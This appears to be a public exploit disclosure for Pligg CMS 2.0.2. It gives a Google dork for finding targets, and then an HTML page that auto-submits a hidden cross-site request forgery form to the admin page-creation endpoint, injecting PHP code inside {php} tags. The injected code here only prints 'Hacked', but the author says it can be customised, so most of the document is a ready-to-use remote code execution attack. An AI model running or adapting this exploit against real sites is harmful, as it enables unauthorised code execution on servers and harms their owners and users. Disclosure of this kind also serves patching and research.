<!--# Exploit Title: Pligg CMS Arbitrary Code Execution# Google Dork: intext:"Made wtih Pligg CMS"# Date: 2015/8/20# Exploit Author: Arash Khazaei# Vendor Homepage: http://pligg.com# Software Link:
https://github.com/Pligg/pligg-cms/releases/download/2.0.2/2.0.2.zip# Version: 2.0.2# Tested on: Kali , Iceweasel Browser# CVE : N/A# Contact : http://twitter.com/0xClay# Mail : 0xclay@gmail.com# Site : http://bhunter.ir# Description :# Pligg CMS Is A CMS Writed In PHP Language And Licensed Under GPL V 2.0# In Pligg CMS Panel In Adding Page Section Pligg CMS Allow To Admin Add
PHP Codes In {php}{/php} Tags
# A CSRF Vulnerabilty In Adding Page Section Allow To Attacker To Execute
PHP Codes On Server .# In This Exploit I Just Added a echo '<h1> Hacked </h1>'; Code You Can
Customize Exploit For Your Self .# Exploit :--><html><body onload="document.exploit.submit();"><form action="http://localhost/pligg-cms/admin/submit_page.php"
method="POST"id="thisform" name="exploit"><inputtype="hidden" name="page_title"id="page_title"
size="66"value="Hacked"/><inputtype="hidden" name="page_url"id="page_url" size="66"
value="Hacked"/><inputtype="hidden" name="page_keywords"id="page_keywords" size="66"
value="Hacked"/><inputtype="hidden" name="page_description"id="page_description"
size="66" value="Hacked"/><textarea type="hidden"id="textarea-1" name="page_content"class="form-control page_content" rows="15">{php}echo '<h1> Hacked </h1>';{/php}</textarea><inputtype="hidden" name="process" value="new_page"/><inputtype="hidden" name="randkey" value="12412532"/></form></body></html><!--# After HTML File Executed You Can Access Page In
http://localhost/pligg-cms/page.php?page=Hacked
# Discovered By Arash Khazaei . (Aka JunkyBoy (Nick Name Changed :P ))-->